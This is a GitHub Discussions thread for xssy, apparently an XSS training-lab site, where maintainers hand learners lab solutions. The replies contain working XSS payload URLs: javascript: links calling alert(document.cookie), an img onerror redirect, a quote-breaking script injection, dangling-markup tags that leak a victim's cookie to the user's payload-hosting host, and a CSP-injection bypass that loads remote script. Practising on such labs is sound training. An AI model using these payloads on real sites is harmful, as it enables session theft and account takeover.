### DISCUSSION TITLE
Welcome to xssy Discussions!

### DISCUSSION THREAD

**Discussion by paj28** [paj28/xssy#5] [Announcements]
## 👋 Welcome!
  We’re using Discussions as a place to connect with other members of our community. We hope that you:
  * Ask questions you’re wondering about.
  * Share ideas.
  * Engage with other community members.
  * Welcome others and are open-minded. Remember that this is a community we
  build together 💪.

  To get started, comment below with an introduction of yourself and tell us about what you do with this community.

**Comment by paulmwright** [comment]
Great resource Paul. Thanks.

**Comment by harry121314** [comment]
Href XSS Lab how i can pass this

**Reply by paj28** [reply]
javascript: URL

**Reply by harry121314** [reply]
sir can u give me full payload

**Reply by paj28** [reply]
Hi Harry. Sure, the full payload is this: https://alo5543d.xssy.uk/target.ftl?url=javascript%3Aalert%28document.cookie%29

**Reply by harry121314** [reply]
thx sir

**Reply by harry121314** [reply]
how tis payload work sir plxz sir can you explain sir plzzzz

**Reply by MechaTech84** [reply]
The Lab takes the value of the "url" parameter as input and outputs it into the `href` attribute of an anchor html tag:

`<a href="INPUTHERE">clickme</a>`


There is a script on the page that automatically clicks that link.

If the browser navigates to a URL that starts with `javascript:` the browser stays on the current page and then executes the rest of the URL as JavaScript code.

**Reply by harry121314** [reply]
thx sir

**Reply by harry121314** [reply]
sir can you give me any content of yours like insta ya any other thing where i can msg you sir plz

**Reply by harry121314** [reply]
i need help sir

**Reply by MechaTech84** [reply]
You can message me on reddit. I run the /r/xss subreddit so I'm helping people regularly there anyway. Same username.

**Reply by harry121314** [reply]
[MechaTech84] sir this name

**Reply by MechaTech84** [reply]
Yeah

**Reply by harry121314** [reply]
sir can you recommend me any real life xss sir i learn all thing but what i can do next how i can find target and can i can do next sir plz can u help me

**Reply by MechaTech84** [reply]
The labs on XSSy are all based on various real world scenarios. Beyond that, the stickied post on /r/xss has a bunch of good resources. I recommend starting there.

**Reply by harry121314** [reply]
sir your help can change my life

**Reply by harry121314** [reply]
sir i msg you

**Reply by harry121314** [reply]
solo name

**Comment by harry121314** [comment]
Href XSS Lab  
sir can u give me full payload

**Comment by user20097** [comment]
hello sir im having trouble with the no brackets lab and i dont like this but im seriously stuck <img src=x onerror=alert`1`> and got a pop up but  cant get document.cookie

**Reply by user20097** [reply]
used backticks to get the pop up

**Reply by MechaTech84** [reply]
Given that that lab has a solution video, I assume you're asking for a hint. Instead of avoiding brackets entirely, I recommend looking for a way to execute JavaScript code that has been encoded and doesn't include literal brackets. For example, `%28` doesn't contain any brackets, but it decodes to a `(`.

**Reply by user20097** [reply]
its the new lab by gr4y-r0se not the  Brackets Filtered XSS  one i tried but it did not quite work

**Reply by MechaTech84** [reply]
Oh my bad, let's see... For that one I do basically the same thing as previously, but inside of an onerror in an img tag because of the way it uses innerHTML.

[Solution Spoiler](https://c5ryxpyq.xssy.uk/target.ftl?search=%3Cimg+src%3D%22xyz%22+onerror%3D%22document.location%3D%27javascript%3Aalert%2528document.cookie%2529%27%22%3E)

**Reply by user20097** [reply]
okay thanks alot did think about that i was stuck trying to figure out a way using backticks

**Reply by harry121314** [reply]
but sir this payload work in modern browsers  <img src="xyz" onerror="document.location='javascript:alert%28document.cookie%29'">

**Reply by harry121314** [reply]
Blocked if CSP is strict or alert() is blacklisted

**Comment by user20097** [comment]
hey @paj28  sir is the site down or is it just me ??

**Reply by paj28** [reply]
Thanks for letting me know, I have restarted it and seems ok for now. Think something has been hitting the site with high traffic.

**Comment by Eternalvalhalla** [comment]
hi Paul, I found a way to solve one of the labs (Lab: HTML Filter - Attribute Bypass) which will pop cookies for me each time but the headless browser seems to error out each time with - Error accessing headless browser. Please try again later.

However, if I give invalid payload, it will correctly say that no alert with cookies detected, have you got any advise? Not sure if its wise to share the payload here for other to see to do not spoil challenge for others :)

**Reply by paj28** [reply]
Hi, I noticed you'd been busy on the site! You've done some great solves. I have pushed out a fix for that issue, so please retry your payload now.

Recent versions of Chrome repeatedly fire the onfocus event, which causes an issue with Selenium, when trying to extract the cookie. Selenium bombs out if an alert is open. But I tweaked the order of stuff so that shouldn't matter now.

**Reply by Eternalvalhalla** [reply]
Thank you! Just tried and it worked. 

And yeah, trying my best haha! Amazing project, love this app, so thank you for creating these labs and keeping it up running!

**Reply by paj28** [reply]
Aw, thanks for the feedback. I've just given you an extra priv on the site which you'll see if you logout/login again :)

**Reply by Eternalvalhalla** [reply]
Wow, thank you!!

**Reply by Eternalvalhalla** [reply]
Just FYI - I have similar issue with the 'Dynamic CSRF' lab, I think I found a very simple solution that works for me and will pop the flag on each browse but the headless browser errors when submitting URL lab :( Not sure if you can see the payloads I used

**Reply by paj28** [reply]
Thanks for letting me know, I have fixed this also

**Reply by harrysandhu9988757803-eng** [reply]
Lab: Beating encodeURI  hello @paj28 can you give me payload

**Reply by harrysandhu9988757803-eng** [reply]
sir

**Reply by paj28** [reply]
Hi, here is a payload that works:
`https://axh77nxo.xssy.uk/target.ftl?name=%27%3Balert%28document.cookie%29%3B%2F%2F`

**Reply by harrysandhu9988757803-eng** [reply]
@paj28 sir can you explain me this lab how we solve Dangling Markup 2

**Reply by paj28** [reply]
Did you solve Dangling Markup 1? Similarly, you load an image from your payload hosting lab. But on this one, you use a single quoted attribute. Something like:
`https://a7piuqnq.xssy.uk/target.ftl?name=%3Cimg+src%3D%27https%3A%2F%2FXXXXXXXX.xssy.uk%2F`

**Reply by sarbjeetsandhu700-tech** [reply]
Bro @paj28  can you give me dangling markup 1 payload

**Reply by paj28** [reply]
Sure, just replace XXXXXXXX with your payload hosting lab token:
`https://gigh5vp3.xssy.uk/target.ftl?name=%3Cimg+src%3D%22https%3A%2F%2FXXXXXXXX.xssy.uk%2F`

**Reply by sarbjeetsandhu700-tech** [reply]
Sir can you give me full payload

**Reply by MechaTech84** [reply]
There isn't an alert in this lab, you just need to exfiltrate the cookie from the other user and then submit that.

**Reply by sarbjeetsandhu700-tech** [reply]
Can you give me payload

**Reply by MechaTech84** [reply]
Sure, just replace XXXXXXXX with your payload hosting lab token:
`https://gigh5vp3.xssy.uk/target.ftl?name=%3Cimg+src%3D%22https%3A%2F%2FXXXXXXXX.xssy.uk%2F`

**Reply by sarbjeetsandhu700-tech** [reply]
Where is token in lab

**Reply by sarbjeetsandhu700-tech** [reply]
I am new in this I am don't understand properly

**Reply by MechaTech84** [reply]
You need to use the "Payload Hosting" page in the "My Labs" section and then have your payload load an image from the URL to the lab you created, but in a way that includes additional data after the image URL. You will need to have the "Payload Hosting" page open in another tab so you are able to see connections made to it. Then you submit the payload to the lab, find the request in Payload Hosting, and extract the cookie. Then submit the cookie to the lab.

It sounds like you need to familiarize yourself with the basics of HTML, JavaScript, and _then_ start working on XSS.

**Reply by sarbjeetsandhu700-tech** [reply]
What is token

**Reply by MechaTech84** [reply]
The part of the URL specific to your Payload Hosting lab.

**Reply by paj28** [reply]
Hi @sarbjeetsandhu700-tech I'd encourage you to watch the solution video for the Capture Cookie lab as it shows some of these techniques

**Reply by sarbjeetsandhu700-tech** [reply]
Ok

**Reply by sarbjeetsandhu700-tech** [reply]
Xxxx i replace with my lab url

**Reply by sarbjeetsandhu700-tech** [reply]
<img+src="https://my lab url

**Reply by MechaTech84** [reply]
Please keep the double posting to a minimum and give more consideration to your messages. I'm getting a notification for every message and it's frustrating.

**Comment by harrysandhu9988757803-eng** [comment]
hello @paj28  can you explain me   CSP - Injection Bypass   this lab

**Reply by harrysandhu9988757803-eng** [reply]
and @MechaTech84

**Reply by paj28** [reply]
Look where the lang parameter injects - it's within the CSP. You can't inject 'unsafe-inline' because single quotes are escaped, but you can inject your payload hosting lab. You need some care due to the trailing .js. I created alert.js on my payload hosting, and set lang to the URL of that, but with .js removed. You can then inject a script tag into the name parameter:
`https://2l5dad5g.xssy.uk/target.ftl?lang=+https://xx.xssy.uk/alert&name=%3Cscript%20src=%22https://xx.xssy.uk/alert.js%22%3E%3C/script%3E`

**Comment by harry121314** [comment]
CSP - Predictable Nonce Bypass  how we bypass csp

**Reply by paj28** [reply]
Have you done the static nonce lab? There is a solution video for that. The predictable nonce is a similar technique.

**Reply by sarbjeetsandhu700-tech** [reply]
Ok 8 try

**Reply by sarbjeetsandhu700-tech** [reply]
Sir

**Reply by harry121314** [reply]
sic can you explain me 
@paj28

**Reply by harry121314** [reply]
@paj28 sir

**Reply by MechaTech84** [reply]
One of the most important skills in information security is being able to solve problems with logical analysis, independent research, and trial and error. You need to back up and learn more about HTTP, JavaScript, HTML, etc. so you understand the problem and can start looking for ways to solve it.

**Reply by harry121314** [reply]
@MechaTech84  thx sir for your advice i bypass it.

**Comment by JackMason1** [comment]
I love the resource, cheers for putting it together!

**Reply by paj28** [reply]
Hi Jack, thanks for your message. I have noticed you getting busy on the labs and keeping MecaTech on his toes :) The lab you submitted recently is a really tough one, took me a while! BTW, did I see you at BSides Leeds?

**Reply by MechaTech84** [reply]
I kept chasing red herrings on that one... I spent so many hours trying to get emojis to decode because of the title and then even more hours trying to figure out how to change the encoding or language because those tags aren't in the default template...

**Reply by JackMason1** [reply]
Sorry, hahaha, I used a variable which was in Burp Intruder's `Server-side variable names`, but looking back now it's probably not as simple as I thought. Let me know if you would make any changes and I'll add them to the lab to make it more solvable.

**Reply by paj28** [reply]
Jack, there are a few length limit labs now. Can I ask you to rename your LimitLength to "Length Limit Bypass"

**Comment by paj28** [comment]
I quite like the emoji in the title. Any particular tool it f issues with?
Burp was fine.

But yeah, could do with don ny an actual HPP request, have have a clue
about the encoding param name.

**Reply by MechaTech84** [reply]
No issues, I just thought it was a clue and kept trying to find a Unicode character that turned into `<`. Started with U+FE64 and U+FF1C, and then went down a rabbit hole looking for other characters to try.

**Comment by echoesofwhoami** [comment]
can I make a video about a challenge that doesn't have a video yet? @paj28

**Reply by paj28** [reply]
Oh yeah, that would be great. If you let me know the URL when you're done I'll review and add it.
